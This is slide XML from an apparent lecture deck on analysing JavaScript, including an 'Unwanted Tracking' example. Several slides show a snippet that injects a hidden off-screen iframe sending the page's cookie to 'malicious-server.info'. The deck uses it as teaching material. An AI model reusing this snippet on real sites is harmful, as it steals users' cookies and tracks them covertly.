                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>yield</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>throw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="470" name="Google Shape;470;p45"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4132365" y="2407210"/>
            <a:ext cx="0" cy="1369053"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="471" name="Google Shape;471;p45"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="468" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2622495" y="2407063"/>
            <a:ext cx="848700" cy="773100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="472" name="Google Shape;472;p45"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="469" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4750517" y="2381965"/>
            <a:ext cx="945300" cy="905100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>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7"/>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471"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="9" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="46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6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7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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="137160" y="822960"/>
            <a:ext cx="8789368" cy="39725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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"div"</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"http_://malicious-server.info/?keyword=c71234b6f4a&amp;cookie=" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>+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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"&lt;div style='position:absolute;top:-1px;left:-1px;'&gt;&lt;iframe src='" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>+ x22q +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"'&gt;&lt;/iframe&gt;&lt;/div&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1">
              <a:solidFill>
                <a:schemeClr val="lt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    document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.body.appendChild(x22);</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478" name="Google Shape;478;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2802811" y="1568344"/>
            <a:ext cx="365760" cy="18288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46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272678" y="1761912"/>
            <a:ext cx="4206240" cy="18288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46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6962695" y="1943971"/>
            <a:ext cx="1280160" cy="18288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46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1594303" y="1943971"/>
            <a:ext cx="4663440" cy="18288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46"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Example: Unwanted Tracking</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Google Shape;483;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477623" y="2126749"/>
            <a:ext cx="2194560" cy="182880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700"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484" name="Google Shape;484;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329633" y="1420427"/>
            <a:ext cx="8104153" cy="1043001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1270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5" name="Google Shape;485;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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="137160" y="822960"/>
            <a:ext cx="8789368" cy="39725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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"div"</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"http_://malicious-server.info/?keyword=c71234b6f4a&amp;cookie=" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>+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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"&lt;div style='position:absolute;top:-1px;left:-1px;'&gt;&lt;iframe src='" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>+ x22q + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"'&gt;&lt;/iframe&gt;&lt;/div&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1">
              <a:solidFill>
                <a:schemeClr val="lt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    document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.body.appendChild(x22);</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491" name="Google Shape;491;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2802811" y="1589610"/>
            <a:ext cx="36576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47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272678" y="1772545"/>
            <a:ext cx="420624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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6962695" y="1952849"/>
            <a:ext cx="128016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47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1594303" y="1952849"/>
            <a:ext cx="466344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47"/>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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Transforming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Function Calls, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Google Shape;496;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="3172968"/>
            <a:ext cx="3675887" cy="186204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497" name="Google Shape;497;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3132989"/>
            <a:ext cx="3291840" cy="192024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8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="137160" y="822960"/>
            <a:ext cx="8789368" cy="39725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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"div"</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"http_://malicious-server.info/?keyword=c71234b6f4a&amp;cookie=" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>+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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"&lt;div style='position:absolute;top:-1px;left:-1px;'&gt;&lt;iframe src='" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>+ x22q + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"'&gt;&lt;/iframe&gt;&lt;/div&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1">
              <a:solidFill>
                <a:schemeClr val="lt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    document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>.body.appendChild(x22);</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504" name="Google Shape;504;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2802811" y="1589610"/>
            <a:ext cx="36576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48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272678" y="1772545"/>
            <a:ext cx="420624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48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6962695" y="1952849"/>
            <a:ext cx="128016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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1594303" y="1952849"/>
            <a:ext cx="466344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8"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>, Function Calls, If Statements</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Google Shape;509;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510370" y="3172968"/>
            <a:ext cx="3675887" cy="186204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510" name="Google Shape;510;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3132989"/>
            <a:ext cx="3291840" cy="192024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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5578186" y="4184792"/>
            <a:ext cx="3138594" cy="668676"/>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12" name="Google Shape;512;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3168571" y="1679286"/>
            <a:ext cx="2409615" cy="2585416"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="513" name="Google Shape;513;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2528491" y="1918794"/>
            <a:ext cx="3049695" cy="2519843"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="514" name="Google Shape;514;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2083633" y="2117441"/>
            <a:ext cx="3494553" cy="2510399"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="515" name="Google Shape;515;p48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5602156" y="2117441"/>
            <a:ext cx="1746157" cy="2688834"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Google Shape;516;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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="137160" y="822960"/>
            <a:ext cx="8789368" cy="39725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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>"div"</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
